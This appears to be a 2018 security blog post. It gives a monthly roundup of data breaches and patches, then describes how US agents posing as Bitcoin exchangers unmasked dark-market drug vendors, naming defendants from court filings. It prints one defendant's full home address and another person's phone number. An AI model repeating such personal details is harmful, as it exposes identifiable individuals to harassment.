Ticketmaster reported the data theft of up to 40,000 UK customers, caused by a security weakness in a customer support app hosted by Inbenta Technologies, an external third-party supplier to Ticketmaster. Ticketmaster told affected customers to reset their passwords and has offered impacted customers a free 12-month identity monitoring service with a leading provider. No details were released on how the hackers exploited the app to steal the data, though it was likely a malware-based attack. However, there are questions over whether Ticketmaster disclosed and responded to the data breach quickly enough, after digital banking company Monzo claimed the Ticketmaster website showed up as a CPP (Common Point of Purchase) in an above-average number of recent fraud reports. The company noticed 70% of fraudulent transactions with stolen payment cards had used the Ticketmaster site between December 2017 and April 2018. The UK's National Cyber Security Centre said it was monitoring the situation.

TSB customers were targeted by fraudsters after major issues with their online banking systems were reported. The TSB technical issues were caused by a botched system upgrade rather than hackers. TSB bosses admitted 1,300 UK customers had lost money to cyber crooks during its IT meltdown; all were said to be fully reimbursed by the bank.
The Information Commissioner's Office (ICO) issued Yahoo a £250,000 fine after an investigation into the company's 2014 breach, a pre-GDPR fine. Hackers were able to exfiltrate 191 server backup files from the internal Yahoo network. These backups held the personal details of 8.2 million Yahoo users, including names, email addresses, telephone numbers, dates of birth, hashed passwords and other security data. The breach only came to light as the company was being acquired by Verizon.

Facebook woes continue, this time a bug changed the default sharing setting of 14 million Facebook users to "public" between 18th and 22nd May.  Users who may have been affected were said to have been notified on the site’s newsfeed.

Chinese Hackers were reported as stealing secret US Navy missile plans. It was reported that Chinese Ministry of State Security hackers broke into the systems of a contractor working at the US Naval Undersea Warfare Center, lifting a massive 614GB of secret information, which included the plans for a supersonic anti-ship missile launched from a submarine. The hacks occurred in January and February this year according to a report in the Washington Post.

Elon Musk (Tesla CEO) claimed an insider sabotaged code and stole confidential company information. According to CNBC, in an email to staff, Elon wrote: "I was dismayed to learn this weekend about a Tesla employee who had conducted quite extensive and damaging sabotage to our operations. This included making direct code changes to the Tesla Manufacturing Operating System under false usernames and exporting large amounts of highly sensitive Tesla data to unknown third parties". Tesla has filed a lawsuit accusing a disgruntled former employee of hacking into its systems and passing confidential data to third parties. The lawsuit says the stolen information included photographs and video of the firm's manufacturing systems, and that the business has suffered "significant and continuing damages" as a result of the misconduct.

Elsewhere in the world, FastBooking had 124,000 customer accounts stolen after hackers took advantage of a web application vulnerability to install malware and exfiltrate data. Atlanta Police dashcam footage was hit by ransomware. And US company HealthEquity had the data of 23,000 customers stolen after a staff member fell for a phishing email.

IoT Security
The Wi-Fi Alliance announced WPA3, the next generation of wireless security, which is more IoT-device friendly, more user-friendly, and more secure than WPA2, which recently had a security weakness reported (see the KRACK vulnerability). BSI announced they are developing a new standard for IoT devices and apps called ISO 23485. A Swann home security camera system sent a private video to the wrong user; this was said to have been caused by a factory error. For guidance on IoT security, see my guidance, Combating IoT Cyber Threats.

As always, a busy month for security patching, Microsoft released 50 patches, 11 of which were rated as Critical. Adobe released their monthly fix for Flash Player and a critical patch for a zero-day bug being actively exploited. Cisco released patches to address 34 vulnerabilities, 5 critical, and a critical patch for their Access Control System. Mozilla issued a critical patch for the Firefox web browser.


Dark Markets’ Weakness? Cashing out the Bitcoin to USD!

Over the years there has been an on-going battle between law enforcement and those who use technology-based anonymity to perform their illegal deeds.  Some of the FBI's tricks to break through the anonymity have created interesting challenges, such as the "Operation Pacifier" case, where the FBI used court orders to allow them to use hacking tricks to expose the true locations of members of a child sexual exploitation site with 150,000 members, leading to 350 US arrests and 548 international arrests.  In that case the FBI deployed "Network Investigative Techniques" (NITs) to learn the IP addresses of top members of a TOR protected .onion server.  To clarify the legality of that situation, Rule 41 of the Federal Rules of Practice and Procedure was amended in 2016 under some controversy, as we blogged about in "Rule 41 Changes: Search and Seizure when you don't know the Computer's location."

In the current case, "Operation: Dark Gold", perhaps as a demonstration that the old "Follow the Money" rule can work even in these modern times, law enforcement posed as cryptocurrency exchangers, offering attractive conversion rates to USD even for those clearly involved in criminal activity.  After Alexander Vinnik's BTC-e exchange was shuttered, with the owner accused of facilitating the laundering of $4 Billion in illicit funds, Dark Market vendors had a real problem!  How do you turn a few million dollars worth of Bitcoin into money that you can spend in "the real world?"

That's just the kind of problem that the Department of Justice's Money Laundering and Asset Recovery Section is happy to help criminals solve. In a major operation, Special Agents from Homeland Security Investigations in New York posed as money launderers on various TOR-protected dark markets. As the money launderers were able to drive conversations "off platform", they had the opportunity to refer cases around the nation and around the world. So far, more than 90 cases have been opened, leading to investigations by ICE's HSI, the US Postal Inspection Service, and the US Drug Enforcement Administration. 65 targets were identified and 35 Darknet vendors have been arrested so far. At least $20 million in Bitcoin and other cryptocurrencies was seized, as well as 333 bottles of liquid opioids, 100,000 tramadol pills, 100 grams of fentanyl, 24 kg of Xanax, 100 firearms (including assault rifles and a grenade launcher), five vehicles, and $3.6 million in cash and gold bars. They also seized 15 pill presses and many computers and related equipment.

Powell and Gonzalez (BonnienClyde)

The case against Nicholas Powell and Michael Gonzalez really explains the background of some of these cases well. 

"In or about October 2016, HSI NY, USPIS, the USSS, and the NASA Office of Inspector General apprehended a Cryptocurrency Exchanger/Unlicensed Money Remitter herein referred to as Target Subject-1. With TS1's cooperation, agents began investigating TS1's customers. From the limited subset of customers for whom TS1 saved any kind of personal information (such as the names and addresses to which TS1 had shipped the customers' cash), agents identified a number of vendors selling illegal goods and services on the dark net." (Gar-note: NASA OIG has one of the coolest, most proactive cybercrime teams in the Federal government. Little-known FACT!)

"With TS1's permission, agents took control of TS1's online accounts and identity, initiating an undercover operation using that identity to create new accounts (the "UC Vendor Accounts") targeting dark net drug vendors who utilized TS1's services to launder their illicit proceeds.  Since January 2017, agents have advertised the UC Vendor Accounts' services on AlphaBay, HANSA, and other dark net marketplaces, which has led to hundreds of bitcoin-for-cash exchanges.  Because TS1's original business model involved sending cash to physical addresses, each UC Vendor Account transaction has provided agents with leads on the identities and locations of their counterparties.  Individuals who used the UC Vendor Account were charged a fee notably higher than the fee charged by Bitstamp or other exchanges with Know  Your Customer protocols.  This and other evidence helped establish that many of these "customers" were likely dark net vendors or controlled substances or other illicit goods.  Furthermore, and as explained below, in some instances, agents have successfully utilized undercover buyer accounts on dark net marketplaces to conduct undercover drug buys from vendors believed to be the UC Vendor Accounts' customers."

In this case, law enforcement first caught up with Michael Gonzalez in Parma, Ohio.  He claimed Nicholas Powell was the mastermind, and that he only got paid to help with shipping and packaging of "a few orders."  His job was to measure out 500-gram bags of Xanax powder and handle the shipping.  Powell was found and interviewed in his home at 5283 Bevens Ave, Spring Hill, Florida on May 22, 2018.  Powell confirmed that he had begun by selling steroids and weed on the dark net, and later became a drop shipper, arranging shipments from China to be delivered domestically.  Powell started on Silk Road 2, using the name BCPHARMA, selling steroids and GHB that he purchased from China.  He sold on Agora and AlphaBay as BONNIENCLYDE or BNC, an alias he later also used on the Evolution marketplace, and eventually shifted to selling Xanax and steroids on AlphaBay.  He claimed he physically destroyed the computer he used for this work, and later also destroyed two Apple computers.

Powell confirmed that he used TS1 to convert between $10,000 and $40,000 in cryptocurrencies to cash at a time, receiving the packages via USPS Express.  He claimed a Canadian vendor wanted to buy his online identity, and that he made $100,000 by transferring the "BONNIENCLYDE" ID to the Canadian.

Powell willingly signed over to agents $438,000 worth of cryptocurrencies.


TrapGod was an online vendor alias shared by Antonio Tirado, 26, and Jeffrey Morales, 32, of the Bronx, New York.  An affidavit from Tirado's search warrant shows he was growing marijuana and packaging and shipping both LSD and cocaine.

Here's a photo of some of TrapGod's goods for sale on one dark market.

The "2050" means that 2,050 people have rated this vendor's services, giving an average review of 4.79 out of 5 stars.  Even the "bad" reviews show that TrapGod was good to do business with.  One says "Vendor has been top notch. Then got some really sub-par stuff.  Contacted vendor. He said he'll take care of me next time. Will post again..."  Comments include things like "Great shipping, good stealth." and "Stealth was good, my package was well hidden and secure.  Quality is good, after testing I found that the product is about a 80/20 cut as described!  I like honesty, plus seller put a little extra in my order!!"  Another reads: "Shipment was delayed, quality not so good. However vendor sent an additional shipment to make up for it.  The price is good, but I'd rather pay more for higher quality."

Unfortunately, either Morales and Tirado weren't the only ones behind the TrapGod alias, or they are continuing to sell while out on bail.  Morales's and Tirado's homes were both raided June 20, 2018, but there were fresh reviews posted yesterday (July 3, 2018).


The next group was worked as a single case (1:18-mj-05193-UA), also in New York, involving raids on three houses in Flushing and Mt. Sinai, New York.  Charges were brought against Jian Qu, Raymond Weng, Kai Wu, Dimitri Tseperkas, and Cihad Akkaya.

Kai Wu and Jian Qu were in one home (Residence-1), where $200,000 in cash, 110 kg of marijuana, and "680 grams of unidentified powders" were seized.

Residence-2 yielded 12kg of Alprazolam, 10kg of marijuana vape cartridges, 570 grams of ecstasy, "12kg of unidentified powder" and four pill presses, used to press powders into ecstasy tablets.  There were also at least 2 kg of THC gummies.

Residence-3 was the home of Dimitri Tseperkas and Cihad Akkaya, where law enforcement recovered $195,000 in cash, 30kg of marijuana, and three loaded shotguns and 100 shotgun shells.

Videos recovered from the cell phones of Wu and Weng (who was not home, but has been observed repeatedly at Residence-1) reveal they also have at least two marijuana grow houses.


Ryan Farace, the indictment makes clear, "has no known medical education, qualifications, or licensing in the State of Maryland or elsewhere," yet he and his partner were manufacturing and distributing serious amounts of Xanax.  So much so that the indictment calls for them to forfeit $5,665,000 in cash as well as a Lincoln Navigator, a GMC pick-up truck, and 4,000 Bitcoins (which currently would be the USD equivalent of more than $26 million!).
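That valuation is simple arithmetic, assuming the roughly $6,600 per-coin price Bitcoin traded at in early July 2018 (the price here is an assumption for illustration, not a figure from the indictment):

```python
# Back-of-the-envelope check of the forfeiture value.  The per-coin price
# is an assumed early-July-2018 figure, used only for illustration.
btc_seized = 4_000
assumed_btc_price_usd = 6_600  # approximate spot price, early July 2018

total_usd = btc_seized * assumed_btc_price_usd
# 4,000 * 6,600 = 26,400,000 -- "more than $26 million"
```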

Not bad for the former parking lot attendant of a Home Depot ... according to Ryan's Facebook, where both of the named vehicles are featured:

The indictment charges the pair with "Conspiracy to Manufacture, Distribute, and Possess with Intent to Distribute Alprazolam" (aka Xanax) (21 USC section 846) as well as "Maintaining Drug-involved Premises" (21 USC section 856) and "Conspiracy to Commit Money Laundering" (18 USC section 1956).


Jose Robert Porras III and his girlfriend, Pasia Vue, were selling marijuana and crystal meth, as well as Xanax and Promethazine-codeine cough syrup ("Lean").  The HSI agent noticed that their Dream Market account advertised the rating they had earned on Hansa.  Big mistake.  The Dutch High Tech Crime Unit holds the seized Hansa servers and is happy to do lookups for law enforcement.  This revealed that "CANNA_BARS" had earned about 56 bitcoins on Hansa, selling crystal meth in quantities as large as 1-pound bars!  They described the product there as "this crystal is directly from manufacturers in mexico so it is made with the highest qaulity products that cant be found in the us. expect the highest qaulity on hansa for the cheapest."  The same criminal also misspelled "quality" the same way on Dream Market, which was further confirmation this might be the same guy.  From Dream Market: "whats up we are canna_bars a vendor of top qaulity weed we offer qps to multiple pounds we are operating out of northern california and have direct relationships with many growers so expect good qaulity for cheap prices."

By searching for this signature typo, "qaulity" for "quality", the agent was also able to confirm that CANNA_BARS was the same person who sold as THEFASTPLUG on Wall Street Market, another dark net marketplace, completing 60 orders there between February 2018 and May 13, 2018.
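The linkage technique is easy to sketch: scan vendor listing texts for the same misspelling across marketplaces. In this minimal sketch, the first three listing snippets are drawn from the quotes above, while the fourth vendor is an invented control that spells the word correctly:

```python
# Sketch of the "signature typo" linkage across marketplaces.
# The first three snippets echo the article's quotes; the last
# (market, alias) pair is an invented control example.
listings = {
    ("Hansa", "CANNA_BARS"): "expect the highest qaulity on hansa for the cheapest",
    ("Dream Market", "canna_bars"): "so expect good qaulity for cheap prices",
    ("Wall Street Market", "THEFASTPLUG"): "top qaulity weed we offer qps to multiple pounds",
    ("Dream Market", "some_other_vendor"): "high quality product, fast shipping",
}

def vendors_with_typo(listings, typo="qaulity"):
    """Return the (market, alias) pairs whose listing text contains the typo."""
    return sorted(key for key, text in listings.items() if typo in text.lower())

matches = vendors_with_typo(listings)
```

Only the three aliases sharing the misspelling match, while the control vendor does not; on real data this is a lead generator, not proof, which is why the agents then corroborated with fingerprints and controlled buys.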

One of his loyal customers, y***h, apparently wished him well after learning of the arrest; in the comments section for THEFASTPLUG on Wall Street Market, they made this July 2, 2018 comment:

In one photograph shared by CANNA_BARS, his hands are shown, palms up, holding marijuana buds.  The fingerprints of the open palms were so clear that they could easily be used to run a fingerprint match:

The HSI Forensic Document Laboratory returned a fingerprint match confirming that the image showed the fingerprints for Jose Robert Porras III, who had prints on file.

CANNA_BARS offered "free samples" of marijuana, which the agent asked for and had shipped to another state.  The package arrived and was confirmed to contain marijuana. (The inner package was wrapped in fabric softener sheets, presumably to stop drug-sniffing dogs?)

HSI surveillance followed Porras and Vue to a US Post Office where they shipped packages, a Bank of America branch where they had accounts, and a storage unit where they maintained their inventory.  Undercover purchases (two pounds of marijuana from CANNA_BARS, and three pounds of "OG Kush" marijuana from THEFASTPLUG) were observed at the gathering and shipping end of the surveillance, providing "end-to-end" proof of the identity of the criminals.

Blockchain analysis linked some of the bitcoin used by CANNA_BARS to accounts that had a bit of KYC information attached.  This revealed four accounts at one exchanger, including one each for VUE (using the email "" and (916) 228-1506) and PORRAS.  These further linked to several bank accounts: two in the name of Pasia Vue, one in the name of Marcos Escobado (a brother(?) of Porras), and another in the name of Julie Hernandez.  Escobado was arrested in Oregon for possession of methamphetamine and had received $11,000 from the bitcoin exchanger in four transactions.
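The investigative chain described here, from dark-market coin addresses through KYC'd exchange accounts to bank accounts, amounts to a pair of lookups. A minimal sketch, where every identifier is an invented placeholder rather than a real record from the case:

```python
# Sketch of the linkage chain: coin address -> exchange account (with KYC
# details) -> bank accounts.  All identifiers are invented placeholders.
address_to_exchange_acct = {
    "btc_addr_1": "exchanger_acct_vue",
    "btc_addr_2": "exchanger_acct_porras",
}
exchange_acct_to_banks = {
    "exchanger_acct_vue": ["bank_acct_vue_1", "bank_acct_vue_2"],
    "exchanger_acct_porras": ["bank_acct_escobado", "bank_acct_hernandez"],
}

def linked_bank_accounts(btc_address):
    """Follow a coin address through its exchange account to bank accounts."""
    acct = address_to_exchange_acct.get(btc_address)
    return exchange_acct_to_banks.get(acct, [])

result = linked_bank_accounts("btc_addr_1")
```

Each hop widens the net: one tainted address can surface every bank account its exchange customer ever cashed out to, which is how Escobado's accounts came into view.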

After TS1's money exchanger service was taken over by the feds, the couple did four more transactions, receiving $56,000 in cash shipped from New York to their drops in Live Oak and Sacramento, California.

In addition to the Drugs and Money laundering charges, Porras was charged with Felon Possessing a Firearm:

Sam & Djeneba Bent

Fewer details are revealed in the Vermont indictment against Sam & Djeneba Bent.  Sam used dark markets to sell Ecstasy (MDMA), LSD, marijuana, and cocaine, and used the TS1 money-exchanging service to cash out more than $10,000 from bitcoin to USD.

They are charged with using a false return address on a package shipped through the postal service.

(Just joking, I know this got long and I wondered if anyone had read this far, haha.)

Daniel Boyd McMonegal 

McMonegal became a dark market vendor in or around December 2016, which might be how he chose his vendor name, Christmastree.  According to the affidavit by Homeland Security Investigations, McMonegal incorporated a "medical marijuana delivery dispensary" on December 2, 2016 under the name "West Coast Organix" in San Luis Obispo, California, and almost immediately started selling the drugs via interstate postal delivery on Dream Market under his Christmastree vendor name.

From June 15, 2017 to May 12, 2018, Christmastree sold 2,800 packages and earned a 4.98 rating on Dream Market!

The rave reviews from buyers make it clear Christmastree really knew his stuff, with high ratings on his Blue Dream, OG Kush, Super Silver Haze, Blackberry Kush, and many others.

Like the others, McMonegal's downfall was getting his Bitcoin turned into cash.  During the time the federal agents controlled TS1's exchange business, McMonegal used it to cash out at least $91,000, which was shipped to him in Mariposa, California in six shipments between April 2017 and March 2018.


For all the crap that has been in the news recently about ICE, Homeland Security Investigations, the team at the lead of many of these investigations, is using technology and brilliant investigators to help shut down some of the worst crimes on the Internet.  If you know an ICE or HSI agent, make sure to let them know you appreciate what they are doing for us all!

(For more of this press conference, please see this YouTube video: "Officers arrest 35 in dark web bust, seize guns and drugs")